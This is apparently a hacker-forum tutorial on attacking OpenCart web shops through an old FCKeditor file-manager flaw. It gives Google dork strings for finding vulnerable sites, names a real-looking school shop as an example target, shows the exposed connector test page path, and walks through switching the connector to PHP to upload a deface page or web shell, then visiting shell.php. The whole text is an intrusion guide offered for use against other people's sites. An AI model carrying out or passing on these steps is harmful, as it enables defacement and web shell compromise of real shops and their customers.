This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here

1- open Google.com and enter Dork:


inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or

nurl:Powered By OpenCart
You'll Got a lot of websites by google, select anyone ... For Example i got this one
School Shopper Home Page (http://www.schoolshopper.com.au/)
Then i'll will simply add the vuln URL after the website

Example
FCKeditor - Connectors Tests (http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

(The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a Page will be open Like This

http://4.bp.blogspot.com/-lidWGvNV1vA/TosW8ZqPi1I/AAAAAAAAAIQ/iL_Bz-Lc_z4/s640/wp1.bmp

Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)

http://2.bp.blogspot.com/-JD7gM3NbpD0/TosYS9WnlxI/AAAAAAAAAIU/KK0eGV0U1jY/s400/wp2.bmp

and Now see file upload option and upload your deface or shell
and for checking shell or deface check this url
www.site.com/deface.html
or
www.site.com/shell.php